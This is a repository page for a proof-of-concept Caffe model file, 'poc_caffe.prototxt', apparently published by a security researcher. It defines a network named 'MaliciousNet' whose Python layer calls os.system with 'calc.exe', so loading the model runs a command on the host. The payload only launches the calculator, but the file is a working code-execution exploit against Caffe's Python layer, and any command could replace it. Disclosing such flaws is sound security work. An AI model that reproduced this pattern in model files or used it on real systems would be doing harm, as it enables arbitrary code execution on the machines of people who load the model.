caffe-python-layer-poc / poc_caffe.prototxt
security-finder's picture
Add PoC file: poc_caffe.prototxt
393b409 verified
Raw
History Blame Contribute Delete
317 Bytes
name: "MaliciousNet"
layer {
name: "data"
type: "Input"
top: "data"
input_param { shape: { dim: 1 dim: 3 dim: 224 dim: 224 } }
}
layer {
name: "exploit"
type: "Python"
bottom: "data"
top: "output"
python_param {
module: "os"
layer: "system"
param_str: "calc.exe"
}
}